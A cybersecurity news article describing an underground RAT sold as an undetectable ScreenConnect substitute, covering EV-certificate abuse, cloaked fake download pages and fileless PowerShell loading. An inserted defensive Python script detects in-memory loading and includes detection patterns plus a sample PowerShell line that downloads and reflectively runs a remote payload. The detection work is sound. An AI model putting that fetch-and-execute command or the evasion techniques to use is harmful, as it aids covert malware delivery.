
Undetectable RAT Emerges as ScreenConnect FUD Replacement

Cybercriminals have begun marketing a new underground Remote Access Trojan (RAT), pitched as a fully undetectable (FUD) alternative to the legitimate remote administration tool ScreenConnect.

The malware is being positioned as a professional “crimeware-as-a-service” product, with the seller promising evasion of modern security technologies through advanced stealth mechanisms.

Bypassing Security With Advanced Evasion

The RAT’s highlight feature is its ability to bypass key defensive layers, including Google Chrome warnings and Microsoft’s Windows SmartScreen. Instead of triggering reputation-based defenses, the malware is bundled with a valid Extended Validation (EV) certificate.

These high-assurance certificates are traditionally used to prove organizational legitimacy, displaying a company name in the browser bar. In this context, however, the abuse of an EV certificate provides a veneer of legitimacy and helps suppress browser and operating system security alerts.

Figure: FUD malware claim

The advertisements shared by the threat actor reveal social engineering delivery methods consistent with classic malware campaigns. For instance, a fake Adobe Acrobat Reader landing page, styled with authentic branding, attempts to trick users into downloading the RAT.

To further evade discovery, the package employs anti-bot mechanisms to detect and restrict access from automated scanners, sandboxes, or security researchers.

Cloaked landing pages ensure benign content is presented during automated analysis, with the real payload only delivered to intended targets.

These anti-analysis features are accompanied by a fileless execution technique, leveraging PowerShell commands to load malicious executables directly into memory.

This approach bypasses traditional antivirus engines focused on file scanning, offering threat actors a hidden backdoor for interactive intrusion campaigns.
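
As an added example (not from the original article or from any vendor tool), the sketch below triages PowerShell script block logging events (Event ID 4104) for the in-memory loading pattern described above. The indicator regexes and the sample events are constructed assumptions; multi-part script blocks are reassembled before matching so that indicators split across fragments are still correlated.

```python
import re
from collections import defaultdict

# Illustrative indicator groups (assumptions, not IoCs from the article).
INDICATORS = {
    "fetch": re.compile(r"DownloadData|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I),
    "decode": re.compile(r"FromBase64String|GZipStream|DeflateStream", re.I),
    # Assembly.Load(byte[]) runs code from memory; LoadFile/LoadFrom read from disk.
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load\(|\.EntryPoint\.Invoke\(", re.I),
    "native_memory": re.compile(r"VirtualAlloc|GetDelegateForFunctionPointer", re.I),
}
LOADERS = {"reflective_load", "native_memory"}

def reassemble(events):
    """Join multi-part 4104 events that share a ScriptBlockId, in MessageNumber order."""
    parts = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sid: "".join(p[n] for n in sorted(p)) for sid, p in parts.items()}

def classify(text):
    """Return (severity, matched indicator groups) for one script block."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if hits & LOADERS and hits - LOADERS:
        return "high", hits      # bytes fetched or decoded, then loaded in memory
    if hits & LOADERS:
        return "medium", hits    # in-memory load with no visible source of the bytes
    return "none", hits

def triage(events):
    return {sid: classify(text)[0] for sid, text in reassemble(events).items()}

# Constructed sample events using the real 4104 field names; values are invented.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 2,
     "ScriptBlockText": "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)"},
    {"ScriptBlockId": "a1", "MessageNumber": 1,
     "ScriptBlockText": "$b = (New-Object Net.WebClient).DownloadData('https://example.invalid/x'); "},
    {"ScriptBlockId": "b2", "MessageNumber": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"ScriptBlockId": "c3", "MessageNumber": 1,
     "ScriptBlockText": "[Reflection.Assembly]::LoadFile('C:\\Tools\\helper.dll')"},
]

if __name__ == "__main__":
    for sid, severity in triage(SAMPLE_EVENTS).items():
        print(sid, severity)
```

Legitimate administration scripts also load assemblies from byte arrays, so the severity is a triage priority for an analyst rather than a verdict.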

FUD Malware and Loader Capabilities

The seller has openly promoted the tool as a dual-purpose RAT and loader. In practice, this means it can serve as both a persistent surveillance mechanism and a staging platform for additional payloads, including ransomware, spyware, and credential-stealing trojans.

The RAT includes a remote viewer capability, enabling the attacker to visually monitor and directly control a compromised desktop session in real time. Such visibility provides opportunities for manual exfiltration of sensitive data, credential harvesting, or lateral movement across networks.

By offering a demo to potential buyers and guaranteeing delivery of the infection package within 24 working hours, the seller underscores the growing professionalism of the cybercrime ecosystem.

Instead of crude malware executables, adversaries are increasingly peddling ready-to-use, stealth-tested tools designed to bypass enterprise-grade defenses.

Security experts warn that this new RAT represents more than just another piece of commodity malware: it highlights how malicious actors continue to exploit trust in legitimate processes and digital certificates.

By mimicking tools like ScreenConnect and exploiting browser trust indicators, adversaries are blurring the line between legitimate software and strategic intrusion platforms, ultimately lowering the barrier to entry for cybercriminals seeking undetectable access solutions.


The post Undetectable RAT Emerges as ScreenConnect FUD Replacement appeared first on Cyber Security News.

rssfeeds-admin
